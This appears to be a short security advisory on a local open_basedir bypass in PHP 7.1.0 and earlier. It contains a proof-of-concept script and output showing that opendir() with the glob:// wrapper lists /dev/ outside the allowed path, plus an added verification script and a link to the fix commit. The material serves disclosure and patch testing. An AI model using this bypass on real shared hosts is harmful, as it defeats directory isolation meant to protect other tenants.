PHP 7.1.0 and prior open_basedir bypass through glob wrapper

2017.01.10
Credit: Anonymous
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# ./php -v
PHP 7.1.0 (cli) (built: Dec 23 2016 16:08:30) ( NTS DEBUG )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies

Test script:
---------------
<?php
if ($dh = opendir($argv[1])) {
    while (($file = readdir($dh)) !== false) {
        echo "$file\n";
    }
    closedir($dh);
}

Expected result:
----------------
Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2
Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2

Actual result:
--------------
# ./php bypass.php "/dev/"
Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2
Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2
# ./php bypass.php "glob:///dev/*"
MAKEDEV
apm
apmctl
arandom
audio
audio0
audio1
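
A self-contained form of the check above for verifying a build after patching, as an added example that is not part of the original report: it narrows open_basedir at runtime to the script's own directory and reports whether opendir() on a glob:// path still lists entries outside it. The function name and the use of "/" as the outside directory (a Unix-like host, run from the CLI) are assumptions.

```php
<?php
// Added example, not from the original report.
// Assumptions: Unix-like host, CLI SAPI, "/" lies outside the script's directory.

/**
 * Returns true when opendir() on a glob:// pattern outside $allowed yields
 * no entries, false when entries outside open_basedir are listed.
 * (Hypothetical helper name.)
 */
function globWrapperHonoursBasedir(string $allowed, string $outsidePattern): bool
{
    // open_basedir can be narrowed at runtime; ini_set() returns false when
    // the new value is not permitted by the already configured restriction.
    if (ini_set('open_basedir', $allowed) === false) {
        throw new RuntimeException("could not set open_basedir to $allowed");
    }

    // Same call as the test script, but with the glob:// prefix applied here.
    $dh = @opendir('glob://' . $outsidePattern);
    if ($dh === false) {
        return true; // the wrapper refused to open the directory
    }

    // A handle was returned: count what it exposes outside the allowed path.
    $leaked = 0;
    while (readdir($dh) !== false) {
        $leaked++;
    }
    closedir($dh);

    return $leaked === 0;
}

$allowed = __DIR__;
$ok = globWrapperHonoursBasedir($allowed, '/*');

echo 'PHP ', PHP_VERSION, ', open_basedir=', ini_get('open_basedir'), "\n";
echo $ok
    ? "glob:// listing outside open_basedir was blocked\n"
    : "glob:// listed entries outside open_basedir (restriction not enforced)\n";

// Non-zero exit status lets a build or configuration check fail on this result.
exit($ok ? 0 : 1);
```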

References:

https://github.com/php/php-src/commit/7e49e8e7970b423968de7a53ea9a0796f4634276


Copyright 2017, cxsecurity.com

 
